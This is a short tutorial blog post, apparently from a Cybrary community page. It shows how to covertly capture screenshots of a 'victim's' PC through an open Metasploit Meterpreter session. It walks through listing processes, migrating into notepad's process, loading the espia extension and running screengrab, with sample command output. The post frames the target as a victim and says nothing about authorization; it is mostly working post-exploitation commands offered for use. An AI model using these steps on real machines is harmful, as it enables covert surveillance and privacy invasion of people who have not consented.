Hi Again,Today, using metasploit and meterpreter,I will tell you how to screen capture a victim's PC / applications.What we need is metasploit and meterpreter configured and opened. This step starts when we have any meterpreter session opened. Every time, after going to CMD, we have Meterpreter Session opened, don't get confused.Just type:

meterpreter > ps

To have a full list of processes running, it will show the processes running list, like this:

Process list============ PID Name Path --- ---- ---- 180 Explorer.exe C:WINDOWSsystem32explorer.exe 248 snmp.exe C:WINDOWSSystem32snmp.exe 260 notepad.EXE C:WINDOWSNotepad.EXE 284 jing.exe c:surgemailjing.exe 332 VMwareService.exe C:Program FilesVMwareVMware ToolsVMwareService.exe 612 VMwareTray.exe C:Program FilesVMwareVMware ToolsVMwareTray.exe 620 VMwareUser.exe C:Program FilesVMwareVMware ToolsVMwareUser.exe

We can now select any task and have a screen capture of it. All you need is:For selecting

meterpreter > migrate 260 [] Migrating to 260... [] Migration completed successfully.
Using espia
  meterpreter > use espia  Loading extension espia...success.
Now to grab screen shots
  meterpreter > screengrab  Screenshot saved to: /root/sWfSCD.jpeg
 Voila! And now, you've done this, too!--Multi Thinker

Start learning with Cybrary

Create a free account

Related Posts

All Blogs